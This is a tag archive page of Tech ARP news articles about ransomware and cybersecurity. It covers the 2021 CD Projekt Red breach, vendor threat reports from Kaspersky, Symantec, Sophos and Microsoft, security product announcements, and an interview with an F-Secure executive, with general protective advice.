Tag Archives: Ransomware

CD PROJEKT RED Hack : Source Codes + Docs Stolen!

CD PROJEKT RED just had their source codes and internal documents stolen in a MAJOR HACK, and they may all end up being leaked!

 

CD PROJEKT RED Hack : Source Codes Stolen, Servers Encrypted!

On 9 February 2021, CD PROJEKT RED announced that their data – including source codes and internal documents – were stolen in a hack, and could possibly be leaked.

Their servers were also encrypted in a secondary ransomware attack by the same hackers, but they had backups of the encrypted data.

CD PROJEKT RED publicly ruled out negotiating with the hackers, or giving in to their demands.

This would likely mean that their source codes and internal documents will eventually be released publicly by the hackers.

The only silver lining – CD PROJEKT RED noted that they do not have any evidence that the personal data of their employees were accessed or stolen.

 

CD PROJEKT RED Hack : The Hackers’ Threats

According to the ransom note left on their servers, the hackers stole :

  • FULL source codes for Cyberpunk 2077, Witcher 3, GWENT and the unreleased version of Witcher 3.
  • ALL of their internal documents on accounting, administration, legal, HR, investor relations and more

They also encrypted all of their CD PROJEKT RED’s servers, but acknowledged that they would most likely recover the data from their backups.

The hackers are giving the CD PROJEKT RED team 48 hours to contact them to negotiate.

If there is no agreement, they threaten to sell or leak the source codes, and release their internal documents to the media.

They claim that the internal documents will make CD PROJEKT RED look bad, causing their stock prices to fall and their investors will lose trust in them.

 

CD PROJEKT RED : Official Statement On Hack

This is the official statement by CD PROJEKT RED on the hack :

Yesterday we discovered that we have become a victim of a targeted cyber attack, due to which some of our internal systems have been compromised.

An unidentified actor gained unauthorized access to our internal network, collected certain data belonging to CD PROJEKT capital group, and left a ransom note the content of which we release to the public. Although some devices in our network have been encrypted, our backups remain intact. We have already secured our IT infrastructure and begun restoring the data.

We will not give in to the demands nor negotiate with the factor, being aware that this may eventually lead to the release of the compromised data. We are taking necessary steps to mitigate the consequences of such a release, in particular by approaching any parties that may be affected due to the breach.

We are still investigating the incident, however at this t time we can confirm that – to the best of our knowledge – the compromised systems did not contain any personal data of our players or users of our services.

We have already approached the relevant authorities, including law enforcement and the President of the Personal Data Protection Office, as well as IT forensic specialists, and we will closely cooperate with them in order to fully investigate the incident.

 

Recommended Reading

Go Back To > Cybersecurity | Games | SoftwareHome

 

Support Tech ARP!

If you like our work, you can help support us by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!


Ransomware Warning : 1 in 3 Attacks Target Business Users!

INTERPOL and Kaspersky are urging organisations to protect their data against ransomware, because 1 in 3 attacks target business users!

 

Ransomware Warning : 1 in 3 Attacks Target Business Users!

Recent Kaspersky research revealed that in 2019, WannaCry is still the most prevalent ransomware circulating, and some 30% of people targeted by ransomware were business users!

  • 30% of ransomware attacks targeted business users
  • Organisations lost, on average, US$1.46 million in costs, fines and repetitional damage in 2019
  • WannaCry attacked 164,433 users in 2019, and accounted for 21% of all ransomware attacks.
  • GrandCrab accounted for 11% of attacks, while Stop accounted for 4%.

WannaCry, arguably the world’s most famous ransomware, reached its peak 3 years ago – on 12 May 2017 – but continues to wreak havoc on unsuspecting victims.

GrandCrab is famous for its ransomware-as-a-service model, rented out to cybercriminals by its developers. Meanwhile, Stop spreads through compromised software and websites, as well as adware.

 

Ransomware : How To Protect Your Business

Here are some tips that Kaspersky is recommending to stay protected against ransomware :

  • Explain to employees how following simple rules can help a company avoid ransomware incidents.
  • Always have fresh back-up copies of your files so you can replace them in case they are lost (e.g. due to malware or a broken device).
  • Don’t just rely on a physical backup, but also store your backup in the cloud for greater reliability.
  • Always update your operating system and software to eliminate recent vulnerabilities.
  • Use anti-ransomware software, which will prevent ransomware from exploiting vulnerabilities in software and applications – especially important for customers who continue to use Windows 7.

And if a corporate device is encrypted by ransomware, please remember that the attack is a criminal offence. You should NOT pay the ransom.

Instead, report the ransomware attack to your local law enforcement agency, and find a decryptor that may work for you. Some are available for FREE.

 

Suggested Reading

Go Back To > Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Acronis Cyber Protect : What Does It Offer?

Acronis Cyber Protect claims to be the “world’s first complete cyber protection solution” for businesses and Managed Service Providers (MSPs).

Let’s take a look at what Acronis Cyber Protect offers!

 

Acronis Cyber Protect : What Is It?

Acronis Cyber Protect is a new cyber protection solution, which combines three key features :

  • Backup and Recovery : to allow reliable recovery of data, apps and systems
  • Malware Protection : to defend data with anti-malware and anti-ransomware protection
  • Security Controls : save IT resources with a simplified but comprehensive endpoint management toolkit

 

Acronis Cyber Protect : Business Benefits

This is what Acronis Cyber Protect promises to offer businesses :

Benefit #1 : Data Availability

Create regular, reliable backups of your data automatically and store them securely so they are instantly available whenever needed.

Benefit #2 : Fast Remediation

Restore data to any device – servers, workstations, VMs, and mobile devices – using full reimage, granular restore, or Instant Restore.

Benefit #3 : Downtime Prevention

Avoid the kind of costly system downtime that’s caused by ransomware, configuration errors, unpatched vulnerabilities, or faulty hardware.

Benefit #4 : Lower TCO

Improve performance, internal SLAs, and IT efficiencies so you can focus on important tasks, while simplifying training and maintenance.

Benefit #5 : Streamlined Protection

Eliminate complexity from your operations with one solution that integrates data protection, malware prevention, and security controls.

 

Acronis Cyber Protect : MSP Benefits

This is what Acronis Cyber Protect promises to offer Managed Service Providers (MSPs) :

Benefit #1 : Improved Profitability

Attract new business, upsell existing customers, and improve your ARPU by offering a full range of superior data protection services.

Benefit #2 : Easier SLA Compliance

Ensure that you are meeting your SLA requirements by helping customers avoid downtime and enabling immediate restores when needed.

Benefit #3 : Greater Cost Control

Reduce administrative costs by using one tool for all tasks – backups, onboarding, monitoring, managing, assistance, and reporting.

Benefit #4 : Decreased Churn

Keep your existing customers happy and satisfied so they come back for more – generating greater financial stability for your business.

 

Acronis Cyber Protect : Availability + Promotion

Acronis Cyber Protect has yet to be released, but you can request for Early Access.

Acronis is also offering Cyber Protect at the same cost of Acronis Cyber Backup Cloud for all service providers until July 31, 2020.

 

Recommended Reading

Go Back To >  Software | Cybersecurity | Enterprise | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Microsoft : Cybersecurity Trends + How To Stay Safe In 2020!

As part of Safer Internet Day (SID), Antony Cook from Microsoft shared the key cybersecurity trends in 2020, and how we can stay safe against those dangers.

Even if we are experienced techies, it is enlightening to find out what Microsoft believes are the cybersecurity threats that we should be looking out for in 2020.

 

Microsoft : Key Cybersecurity Trends In 2020!

Cybersecurity Trend #1 : Less Ransomware But More Attacks

Ransomware has declined in recent years, dropping more than 60% from its peak. But Microsoft sees a rise in other types of cyberattacks.

Attackers have learned that ransomware attracts too much attention from law enforcement, and organisations have gotten better at backing up their data.

So hackers are moving onto other activities like cryptocurrency malware and phishing, where they can more easily profit with less attention.

Cybersecurity Trend #2 : Mining Malware Will Be Big!

Attackers are often acting for financial benefit, so they will make big bets on cryptocurrency, especially in Bitcoin.

They will focus more on mining malware that lets them use your computer to mine cryptocurrency coins without being detected.

Coin mining software is easily available, and cybercriminals have put malware into many widely-shared and used software. They are also trying to inject these malware through websites illegally streaming copyrighted content like the latest movies.

Cybersecurity Trend #3 : Embedded Threats

Attackers are now more sophisticated, targeting legitimate and trusted software supply points to deliver malware. There have been many examples of this attack vector :

  • a routine update for a tax accounting application,
  • popular freeware tools which have backdoors forcibly installed,
  • a server management software package,
  • an internet browser extension or site plugin,
  • malicious images which active scripts when clicked,
  • peer-to-peer applications

In those cases, attackers were able to change the code of legitimate software that people trust and install without hesitation, allowing them to “hitch a ride”.

This attack vector is very dangerous and frustrating, because it takes advantage of the trust that consumers and IT departments already have for legitimate software.

Cybersecurity Trend #4 : Phishing Scams

Phishing continues to be one of the most effective ways to compromise systems, because it targets human decisions and judgment.

Microsoft noted that the percentage of inbound emails that were detected as phishing messages increased 250% throughout 2018, and they expect the final figures for 2019 to show the same trend.

 

Microsoft : How To Stay Safe In 2020!

Here is a summary of what Microsoft believes we should do to stay safe online against cybersecurity threats in 2020 :

Cybersecurity Tip #1 : Practice Good Security Hygiene

  1. Keep your operating system and software updated.
  2. Turn on email and browser protections.
  3. Apply the cybersecurity configurations that your hardware and software vendors recommend.
  4. Stay away from any unfamiliar software or websites.
  5. Use only legitimate software, and not just your key applications.

Cybersecurity Tip #2 : Implement More Access Controls

System administrators should implement more access controls, using Zero Trust or at least privilege models.

This will limit hackers that successfully break into your network from accessing more than a segment.

Cybersecurity Tip #3 : 3-2-1 Backup!

Make sure you create and keep backups, and the cloud is a great tool for this.

Microsoft recommends adhering to the 3-2-1 rule – keep three backups of your data on two different storage types, with at least one backup offsite.

Cybersecurity Tip #4 : Keep Vigilant!

Even if we implement strong cybersecurity measures, we must remain vigilant, and keep an eye out for suspicious activity.

Not just system administrators, but users as well. If you see anything suspicious – report it to your IT department immediately.

It can be anything from a sudden slowdown in your computer’s performance, to strange web pages and images appearing.

 

Recommended Reading

Go Back To > Computer SystemsHome

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!


Acronis True Image 2020 – Everything You Need To Know!

Acronis True Image 2020 was just released, and it is the first personal data protection solution to automate the 3-2-1 backup rule!

Here is EVERYTHING you need to know about Acronis True Image 2020!

 

Acronis True Image 2020

Acronis True Image 2020 is the first major update since True Image 2018 was released two years ago.

With this release, Acronis believes it has successfully addresses all Five Vectors of Cyber Protection – ensuring the safety, accessibility, privacy, authenticity and security of the user’s data (SAPAS).

Like its predecessor, it combines data backup and recovery capabilities, with anti-malware technology. The new release though boasts more than 100 enhancements. Let’s take a look at some of them…

Dual Protection In True Image 2020

Acronis True Image 2020 is the first personal data protection solution to automate the 3-2-1 backup rule.

It will automatically replicate local backups into the cloud, so you will always have an off-site copy for recovery.

After you completed the first backup, the backup and replication process will henceforth occur simultaneously.

True Image 2020 Tray Notifications Center

Acronis True Image 2020 now pushes messages about your data to your desktop tray, so you can easily monitor the status of your backups.

In addition to alerting you to urgent issues that require your response, it will also send you tips on how to enhance your computer’s protection.

Back Up Only On Selected Wi-Fi Networks

You will now have greater control, including the ability to select which Wi-Fi network to transfer your back-ups.

This allows you to avoid costly metered connections, and insecure public networks that could put your data at risk.

Custom Power Management

You will also have control on when your backups will run while you are on battery power. You can :

[adrotate group=”2″]
  • completely prevent backups whenever you are on battery power,
  • set a minimum power level for backups to run

Mac Power Nap Backups!

Acronis True Image 2020 will support Power Nap backups. Enable it, and your Mac will backup its data during its Power Nap.

In addition, any changes to your Mac’s data during its Power Nap will be captured in those backups too!

 

Acronis True Image 2020 Price + Availability

Acronis True Image 2020 is available in three versions, with immediate effect :

Standard Edition

This is a perpetual license designed for customers who store their data on local drives only.

It does not come with cloud storage or cloud-based features. However, you can make local backups of an unlimited number of mobile devices.

Pricing starts at $49.99 for one computer.

Advanced Edition

This is a one-year subscription that includes 250 GB of Acronis Cloud Storage, and access to all cloud-based features.

You will be able to make both local and cloud backups of an unlimited number of mobile devices.

Pricing starts at $49.99 per year for one computer.

Premium Edition

This is a one-year subscription that includes blockchain-based data certification and electronic signature capabilities, as well as 1 TB of Acronis Cloud Storage.

Pricing starts at $99.99 per year for one computer.

All versions include Acronis Active Protection – an AI-powered anti-malware protection, and covers an unlimited number of mobile devices.

 

Recommended Reading

Go Back To >  Software | Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

MegaCortex Ransomware Analysis + Prevention by Sophos!

Sophos just released their analysis of the MegaCortex ransomware whose speed and spread of attack are very worrying! Get the key details about MegaCortex and how to prevent an attack!

 

What Is Megacortex?

MegaCortex is a new ransomware that was rarely seen until it suddenly spiked in volume in May 2019. Similar to infamous ransomware like Ryuk and BitPyamer, it is now spreading rapidly in these countries :

  • US
  • Canada
  • Argentina
  • Italy
  • The Netherlands
  • France
  • Ireland
  • Hong Kong
  • Indonesia
  • Australia

Why Is MegaCortex Dangerous?

Ransomware attacks are usually carried out in 3 ways:

  • Manual attacks
  • Automated attacks
  • Blended attacks

Unlike Ryuk and BitPyamer, MegaCortex is controlled by cybercriminals using more automated tools, and designed to spread infection to many victims at a much faster speed.

 

What Does MegaCortex Demand?

Unlike other ransomware attacks, MegaCortex has no clear ransom demands.

All it does is invite its victims to email the attackers on any of two free email addresses, attaching a file that had been dropped into the victim’s hard disk drive, to request decryption services.

The ransom note includes “a guarantee that your company will never be inconvenienced by us“. On top of that, if the victim pays the ransom, “You will also receive a consultation on how to improve your companies cyber security“.

How sweet of them.

 

How To Protect Against MegaCortex

Sophos recommends the following steps to protect your business from MegaCortex and the threat of ransomware attacks in general :

  • Companies are cautioned to be on the highest alert should they see warning signs about Emotet or Qbot, as there is strong correlation between MegaCortex and the two ransomwares.
  • Place the company Remote Desktop Protocol (RDP) machine behind a Virtual Private Network (VPN)
  • Practice two-factor authentication for systems logins
  • Regular backup of important and current data on an offline storage device
  • Use anti-ransomware software like Sophos Intercept X Advanced.

 

Recommended Reading

Go Back To > Cybersecurity | Home

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!


Secureworks Launches Red Cloak TDR Cybersecurity Service!

Secureworks just launched Red Cloak TDR at Dell Technologies World 2019 in Las Vegas! Here is a primer on the Secureworks Red Cloak TDI cybersecurity service!

 

SecureWorks Launches Red Cloak TDR

At Dell Technologies World 2019, Secureworks, a Dell Technologies subsidiary, unveiled Red Cloak TDR, their software-as-a-service (SaaS) app that allows companies to securely manage their own cybersecurity measures.

Developed with over 20 years of field experience in cybersecurity, Red Cloak TDR offers a new way for companies to detect, investigate and respond to online threats such as malware, ransomware etc. Unlike other cybersecurity services, it is aided by deep learning, and machine learning.

The AI assistance helps it quickly detect new and unknown online threats, while reducing false alarms. It also helps cybersecurity teams focus on the real or high-risk threats.

 

How Secureworks Red Cloak TDR Will Transform Cybersecurity

Cybersecurity threats can go undetected for hundreds of days in the gaps and disconnected layers of security products. This is particularly problematic with apps and services that are not updated on a daily or even hourly basis.

Red Cloak TDR Is Cloud-Native

As a cloud-native application, it can be quickly updated after investigations revel a new threat. In addition, the service includes the following features :

  • Intuitive workflows
  • Automation
  • Chat feature
  • Access to Secureworks’ cybersecurity team and network

Software-as-a-Service

As a software-as-a-service (SaaS) app, there is no hassle of installing on-site hardware or software system version upgrades. All updates, back-ups and tuning will be covered by the Red Cloak TDR app.

The app does not charge by data consumption like some apps, so users are free to process and manage all the security data they need to protect their organisation. The app is also designed to integrate into the organisation’s own control framework.

 

Recommended Reading

Go Back To > Enterprise + Business | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!


2019 Symantec Internet Security Threat Report Highlights!

Symantec held an exclusive briefing on the newly-released 2019 Symantec Internet Security Threat Report. In this article, we will share with you the full briefing video, as well as highlights from that Symantec cybersecurity report!

 

The 2019 Symantec Internet Security Threat Report

The 2019 Symantec Internet Security Threat Report is the 24th volume published so far. Based on data from Symantec’s Global Intelligence Network, the ISTR is designed to give businesses and the public an overview of the cybersecurity threat landscape.

The Symantec Global Intelligence Network, incidentally is the world’s largest civilian cybersecurity threat intelligence network. It records events from 12 million attack sensors across more than 157 countries worldwide, blocking 142 million threats every day.

 

The 2019 Symantec ISTR Briefing Highlights

Briefing us on the 2019 Symantec ISTR was Sherif El-Nabawi, Vice-President of Sales Engineering, Symantec APJ; and David Rajoo, Chief Cybersecurity Architect, Symantec ASEAN.

Diminishing Returns Of Ransomware + Cryptojacking

Ransomware, which encrypts and holds data hostage in return for payment in the form of cryptocurrency, has been hit by declining cryptocurrency values as well as increasing adoption of cloud and mobile computing. This led to a 20% drop in infections.

Cryptojacking, in which malware is used to steal computing power from consumers and enterprises to mine cryptocurrency is similarly hit by the drop in cryptocurrency value. Symantec noted that cryptojacking activity declined by 52% in 2018. Even so, it is still a major problem – they blocked 3.5 million attempts in December 2018 alone!

Formjacking Overtakes Ransomware + Cryptojacking

With diminishing returns from ransomware and cryptojacking, cybercriminals now prefer formjacking.

Formjacking is basically a form of virtual ATM skimming. They basically inject malicious code into an online shopping site to steal shoppers’ payment card details.

According to Symantec, more than 4,800 websites are compromised with formjacking code every month, and they blocked more than 3.7 million formjacking attacks on endpoints in 2018.

Generally, small and medium retailers are most widely compromised, and a third of the attacks happened during the business online shopping period of the year – from November through December.

Cloud Is The New Weak Point

With the greater adoption of cloud computing, the same security mistakes are happening in the cloud… with exponentially greater consequences. In 2018, more than 70 million records were stolen from poorly-configured AWS S3 buckets.

Hardware vulnerabilities like Meltdown, Spectre and Foreshadow also put cloud services at risk of being exploited to gain access to every protected memory space in the compromised server. In a single server, data from hundreds of companies could be stolen by a single exploit.

Living off the Land Attacks On Supply Chain

Supply chain attacks using Living off the Land (LotL) tools have increased by 78% in 2018. For example, the use of malicious PowerShell scripts increased by 1,000 percent last year, with Symantec blocking 115,000 of them each month – less than 1%.

These attacks are hard to defend against, because they use the same tools users and organisations need to function. Identifying and blocking them will require the use of advanced detection methods like analytics and machine learning.

Internet of Things (IoT) Attacks Are Changing

While the volume of attacks of IoT devices remains high and consistent with 2017 levels, their profiles are changing. In addition to routers and wireless cameras, attacks now have access to smart light bulbs and virtual voice assistants.

Smartphones Are The Greatest Spying Devices

According to Symantec, smartphones are the greatest spying devices ever created. Their research show that :

  • 45% of the most popular Android apps and 25% of the most popular iOS apps request location tracking,
  • 46% of popular Android apps and 24% of popular iOS apps request permission to access the smartphone camera, and
  • email addresses are shared with 44% of top Android apps and 48% of top iOS apps!

 

Suggested Reading

[adrotate group=”2″]

Go Back To > Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky Lab Warns Of Malicious Cryptocurrency Mining!

Kaspersky Lab is warning of malicious cryptocurrency mining powered by pirated software and content. Learn more about this new online threat!

 

Kaspersky Lab Warns Of Malicious Cryptocurrency Mining!

Kaspersky Lab has warned that the global outbreak in malicious cryptocurrency mining in 2018 has increased by more than 83%5 million users were attacked online in the first three quarters of 2018 compared to 2.7 million users in 2017.

The major driver behind the malicious cryptocurrency mining was the use of unlicensed software and content.

 

Malicious Cryptocurrency Mining

Malicious cryptocurrency mining has prevailed over the main threat of ransomware in recent years. The number of  attacks had increased steadily during the first half of 2018. It peaked in March with about 1.2 million users attacked.

Kaspersky Lab experts have investigated the regulatory landscape and electricity prices in the top 10 countries targeted by crypto miners and main infection vectors for the popular malware families.

The investigation of malware families revealed that they mainly infected devices by duping users into installing pirated software and unlicensed content.

“Our analysis of the economic background of malicious crypto mining and the reasons for its widespread presence in certain regions revealed a clear correlation: the easier it is to distribute unlicensed software, the more incidents of malicious crypto miner activity were detected. In short, an activity not generally perceived as dangerous: the downloading and installation of dubious software, underpins what is arguably the biggest cyberthreat story of the year – malicious crypto mining,” notes Evgeny Lopatin, security expert at Kaspersky Lab.

Other Key Findings From The Report

  • The total number of users who encountered miners rose by more than 83% from 2,726,491 in 2017 to 5,001,414 in 2018
  • The share of miners detected increased from 5% in 2017 to 8% in 2018
  • The share of miners detected from the overall risk tool detections has risen from 9% in 2017 to 17% in 2018
  • The total number of users who encountered mobile miners also grew by over 5 times from 1,986 in 2017 to 10,242 in 2018.

 

Steps To Reduce Risk Of Infection

  • Always update software on all your devices to prevent miners from exploiting vulnerabilities.
  • Use tools that can automatically detect vulnerabilities and download and install patches.
  • For personal devices, use a reliable consumer security solution and remember to keep key features such as System Watcher switched on.
  • Don’t overlook less obvious targets such as queue management systems, POS terminals and even vending machines.
  • Use application control to track malicious activity in legitimate applications.
  • Specialized devices should be in Default Deny mode.
  • Use dedicated security solution such as Kaspersky Endpoint Security for Business
  • To protect the corporate environment, educate your employees and IT teams to keep sensitive data separate and to restrict access.

 

Recommended Reading

[adrotate group=”2″]

Go Back To > Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

First Kaspersky Transparency Center Launched In Zurich!

Kaspersky Lab just launched their first Data Processing and Transparency Center in Zurich. This is part of their Global Transparency Initiative that we covered a while back.

Let’s take a look, and find out what this means for Kaspersky Lab and global cybersecurity!

 

The First Kaspersky Transparency Center

Malicious and suspicious files shared by users of Kaspersky Lab products in Europe will be processed in Kaspersky Lab data processing centers in Zurich, the first part of a relocation commitment made by the company in late 2017 under its Global Transparency Initiative.

The move reflects Kaspersky Lab’s determination to assure the integrity and trustworthiness of its products and the data processing center is accompanied by the opening of the company’s first Transparency Center in Zurich.

The relocation of Kaspersky Lab data processing is part of a major infrastructure move designed to increase the resilience of the company’s IT infrastructure to risks of data breaches and supply-chain attacks. It also further proves the trustworthiness of its products, services and internal processes.

 

Threat-Related Data and Malicious Files

From November 13, threat-related data coming from European users will start to be processed in two datacenters. These provide world-class facilities in compliance with industry standards to ensure the highest levels of security.

The data, which users have actively chosen to share with Kaspersky Lab, includes suspicious or previously unknown malicious files and corresponding meta-data that the company’s products send to Kaspersky Security Network (KSN) for automated malware analysis.

Files comprise only part of the data processed by Kaspersky Lab technologies, yet the most important one. Protection of customers’ data, together with the safety and integrity of infrastructure is a top priority for Kaspersky Lab, and that is why the file processing relocation comes first and is expected to be fully accomplished by the end of 2019.

The relocation of other types of data processed by Kaspersky Lab products, consisting of several kinds of anonymized threat and usage statistics, is planned to be conducted during later phases of the Global Transparency Initiative.

 

Kaspersky Lab’s First Transparency Center

The opening of Kaspersky Lab’s first Transparency Center in Zurich enables authorized partners to access reviews of the company’s code, software updates and threat detection rules, along with other activities.

Kaspersky Lab will provide governments and partners with information on its products and their security, including essential and important technical documentation, for external evaluation in a secure environment.

These developments will be followed by the relocation of data processing for other regions and, in phase two, the move of Kaspersky’s Lab’s software assembly to Zurich.

 

Kaspersky Lab’s Choice of Location in Zurich, Switzerland

Switzerland is a top location in terms of the number of secure internet servers available and is known as an innovative center for data processing and high quality IT infrastructure. A non-EU member in the heart of Europe, Switzerland has established its own data privacy regulation that is guaranteed by the state’s constitution and federal laws. There are strict regulations on processing data requests received from authorities.

“Transparency is becoming the new normal for the IT industry– and for the cybersecurity industry in particular. We are proud to be on the front line of this process. As a technological company, we are focused on ensuring the best IT infrastructure for the security of our products and data, and the relocation of key parts of our infrastructure to Switzerland places them in one of the most secure locations in the world.

The promises made in our Global Transparency Initiative are coming to fruition, enhancing the resilience and visibility of our products. Through the new Transparency Center also in Switzerland, trusted partners and governments will be able to see external reviews of our products and make up their own minds. We believe that steps such as these are just the beginning – for the company and for the security industry as a whole. The need to prove trustworthiness will soon become an industry standard.” Eugene Kaspersky, CEO Kaspersky Lab said.

 

Kaspersky Lab’s Next Big Step

Kaspersky Lab has engaged one of the Big Four professional services firms to conduct an audit of the company’s engineering practices around the creation and distribution of threat detection rule databases. This is done with the goal of independently confirming their accordance with the highest industry security practices.

The assessment will be done under the SSAE 18 standard (Statement of Standards for Attestation Engagements). The scope of the assessment includes regular automatic updates of antivirus records which are created and distributed by Kaspersky Lab for its products operating on Windows and Unix Servers. The company is planning the assessment under SSAE 18 with the issue of the SOC 2 (The Service and Organization Controls) report for the second quarter 2019 as part of its ongoing efforts to improve the security of its products with the help of a community of security enthusiasts from all over the world.

 

Recommended Reading

[adrotate group=”2″]

Go Back To > Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Exclusive : Tech ARP Interviews Keith Martin Of F-Secure!

F-Secure Regional Director of APAC and Japan, Keith Martin, flew into Singapore to ink a major regional partnership agreement with ACE Pacific Group. Timothy Shim from Tech Barrista and I had the opportunity to interview Mr. Martin about cybersecurity trends in Asia Pacific and worldwide.

 

Tech ARP Interviews Keith Martin

Keith Martin is the Head of Asia Pacific Corporate Business, F-Secure. Here was our exclusive interview with Mr. Martin after he officially signed the APAC partnership agreement with ACE Pacific Group.

The Cybersecurity Business

Tech ARP : How has your long experience in Japan helped you with F-Secure’s business in Japan?

Keith Martin : Japan is one of the largest market for F-Secure, and we are trying to replicate that (success) in the APAC region.

Tech ARP : Are you still based in Japan?

Keith Martin : Yes, but I have now racked up a lot of frequent flyer miles.

Tech ARP : What are your thoughts on the cybersecurity market in the APJ (Asia Pacific and Japan) region?

Keith Martin : Japan is a large market, but the growth rates are relatively stable. We look at the Asia Pacific region (which includes India, Australia and New Zealand), as the next source of growth for F-Secure.

Tech ARP : What are your plans, and areas of focus, for the APJ region?

Keith Martin : Without question, Singapore is going to be a major focus for F-Secure, as well as Australia and New Zealand. We just signed a major partnership agreement with ACE Pacific, which will be a cornerstone of our strategy in coming years.

Cybersecurity Backdoors

Tech ARP : Chinese and Russian companies have been hit by accusations of cyber espionage and hacking, loose security and/or inserting backdoors into their products. Do you see this as a good opportunity to promote F-Secure’s products, or is this a poison pill for the entire industry?

Keith Martin : I don’t think it’s a poison pill for the entire industry. I have never seen any direct evidence that these go beyond mere accusations, but I understand the need to be cautious. One of the things that F-Secure is proud of is our policy that we will never add a backdoor into our products.

We are willing to walk away from any business if it means adding a backdoor. This is just the way we operate, because Finland has extremely tough privacy laws.

I think it’s absolutely an opportunity for us to differentiate ourselves (from the other cybersecurity companies) with our public pledge never to add backdoors in our software.

Tech ARP : Some countries like China and Russia are demanding access to encryption keys, and in some cases, requiring registration of VPN services. How do those tightening laws affect F-Secure products like Freedome VPN?

Keith Martin : F-Secure is very focused on maintaining the security of our products, so if those are the requirements, we will decline and get out of those markets. We would rather walk away from the potential business, than compromise the security of our products.

Government Interest

Tech Barrista : On the geopolitical implications of malware, do you feel that governments are increasingly more focused on cybersecurity on a national scale?

Keith Martin : For sure. We now see nation states attacking each other. There’s no denying that fact. Look at Stuxnet, that malware (which was targeted at Iran) got released into the wild and suddenly, people have the technology to use it elsewhere for nefarious purposes. I think that any country that does not pay attention to cybersecurity is sticking their heads into the sand.

Tech Barrista : Do you feel that this presents a greater opportunity for F-Secure?

Keith Martin : It represents opportunity, of course, but our mission as a company is to stop the spread of malware and cybersecurity attacks, wherever they happen. It’s a kind of Catch-22 situation, where we wish that nation states would not attack each other, but yes, we have the opportunity to help them protect themselves against such attacks.

[adrotate group=”1″]

Transparency

Tech ARP : What is F-Secure doing to promote and enhance source code transparency? Like opening up transparency centers?

Keith Martin : At this point in time, there are no plans to do so. We have a very good reputation throughout our 30-year history of being straightforward and upfront. I have never seen any accusations against us of malicious activities.

Tech ARP : Does F-Secure allow corporations or countries with concerns to inspect their code?

Keith Martin : I don’t know of any specific situations in Asia Pacific where F-Secure has allowed this. It may have been allowed in other regions, where governments have specific concerns, but I’m not aware of those situations.

Malware Galore!

Tech ARP : Ransomware and phishing attacks are big problems these days. Can you detail how F-Secure can help users prevent or mitigate the risks of ransomware and/or phishing attacks.

Keith Martin : Third-party analysis of our software show that we are actually better at detecting these 0-day attacks than any other companies out there. We pride ourselves in detecting not just the malware we know about, but also the malware we don’t about, using technologies we have been developing over the last 20 years.

We have a multi-layered engine, where we use everything from the basic pattern matching technology, to heuristics, etc. so that if it doesn’t catch the malware on the first layer, it will catch the malware on the second or third or fourth layer.

Tech Barrista : Is malware-as-a-service now common?

Keith Martin : It is becoming more and more common. The entry barrier to launching a malware attack is now much lower due to the ability to outsource the creation of the malware.

Cybersecurity Risks Of IoT Devices

Tech Barrista : With cybercriminals leveraging the Internet of Things and Artificial Intelligence, how much more complex do you see the cybersecurity landscape becoming?

Keith Martin : It’s becoming incredibly complex. Our Chief Research Officer Mikko Hypponen said, “Once you connect something to the Internet, it’s vulnerable“. Billions of devices connected to the Internet become potential attack vectors for cybercriminals.

Most IoT devices don’t have good security. If you can get into one of those devices, you can get into the network through them.

Tech ARP : Does F-Secure have any products to mitigate the risks of poorly-secured IoT devices?

Keith Martin : On the consumer side, we have F-Secure Sense, which protects every device on your network.

[adrotate group=”1″]

 

Keith Martin’s Professional Bio

Keith Martin has been Country Manager for F-Secure Japan for 2 years, before being promoted in February 2018 to oversee the entire Asia Pacific region.

Prior to joining F-Secure in 2015, he spent a decade in the telephony and contact center space, first working for four years in Avaya Japan as Director of Multinational Account Sales, followed by six years serving as Japan Country Manager for Interactive Intelligence, a pioneer in cloud contact center technology.

Before that, Keith also spent three years at internet startup ValueCommerce helping build their web hosting platform business before the company was acquired by Yahoo Japan. He got his start at global IT services provider EDS (now HP), delivering IT services to numerous financial industry accounts.

Go Back To > Cybersecurity | Home

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

The Kaspersky Cloud Sandbox Service Revealed!

To help companies improve their investigation and response to complex threats, Kaspersky Lab just launched a new service called Kaspersky Cloud Sandbox. It gives businesses the opportunity to take advantage of sandboxes without any additional investments into hardware infrastructure.

The Kaspersky Cloud Sandbox solution is available by subscription as part of the Kaspersky Threat Intelligence Portal. Allowing customers to ‘detonate’ suspicious files in a virtual environment with a full report on the file’s activities, it is designed to boost the efficiency of incident response and cybersecurity forensics without any risks to the company’s IT systems.

 

The Kaspersky Cloud Sandbox Revealed!

Exploiting legitimate software flaws became an efficient commodity for cybercriminals in 2017, as malicious activities can be easily hidden behind trusted processes. Even an experienced cybersecurity team can’t always be sure if it has spotted all the malware using such concealment techniques.

To achieve that, teams have to be equipped with advanced detection technologies, including sandboxing, which often requires significant hardware investments that are not easily feasible for many IT Security teams.

